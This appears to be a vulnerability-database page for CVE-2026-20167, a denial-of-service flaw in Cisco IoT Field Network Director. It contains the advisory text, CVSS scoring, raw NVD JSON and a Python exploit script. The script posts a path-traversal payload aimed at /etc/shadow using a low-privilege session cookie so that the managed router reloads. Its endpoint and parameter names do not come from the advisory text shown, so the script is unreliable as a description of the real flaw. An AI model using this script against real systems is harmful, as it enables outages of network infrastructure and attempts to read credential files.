Security Vulnerability Report
CVE-2026-20167 CVSS 7.7 HIGH

CVE-2026-20167

Published: 2026-05-06 17:16:20
Last Modified: 2026-05-06 18:59:53

Description

A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to cause a DoS condition on a remotely managed router. This vulnerability is due to improper error handling. An attacker could exploit this vulnerability by submitting crafted input to the web-based management interface. A successful exploit could allow the attacker to request unauthorized files from a remote router, causing the router to reload and resulting in a DoS condition.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Cisco IoT Field Network Director (for the specific affected versions, refer to Cisco Security Advisory cisco-sa-iot-fnd-dos-n8N26Q4u)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: Cisco IoT Field Network Director DoS PoC (CVE-2026-20167)
# Description: Triggers unauthorized file request causing router reload.

# Placeholders: replace with the target host and a valid low-privilege session cookie.
TARGET_URL = "https://<target-ip>/webui/api/manage"
SESSION_COOKIE = "<low_priv_auth_cookie>"


def exploit_dos():
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Cookie": f"JSESSIONID={SESSION_COOKIE}",
    }
    # Malicious payload to trigger improper error handling
    # Attempting to request unauthorized files leading to DoS
    payload = {
        "fileReq": "/../../../../../etc/shadow",
        "action": "export_config",
    }
    try:
        print(f"[+] Sending payload to {TARGET_URL}...")
        response = requests.post(
            TARGET_URL, data=payload, headers=headers, verify=False, timeout=5
        )
        if response.status_code == 200 or response.status_code == 500:
            print("[+] Payload sent successfully. Check router status for DoS condition.")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        # A dropped connection may mean the managed router has reloaded.
        print(f"[!] Connection error (Router may have reloaded): {e}")


if __name__ == "__main__":
    exploit_dos()
```

References

Cisco Security Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iot-fnd-dos-n8N26Q4u
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-20167",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-06T17:16:20.433",
    "lastModified": "2026-05-06T18:59:53.230",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to cause a DoS condition on a remotely managed router.\r\n\r\nThis vulnerability is due to improper error handling. An attacker could exploit this vulnerability by submitting crafted input to the web-based management interface. A successful exploit could allow the attacker to request unauthorized files from a remote router, causing the router to reload and resulting in a DoS condition."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iot-fnd-dos-n8N26Q4u",
        "source": "[email protected]"
      }
    ]
  }
}
```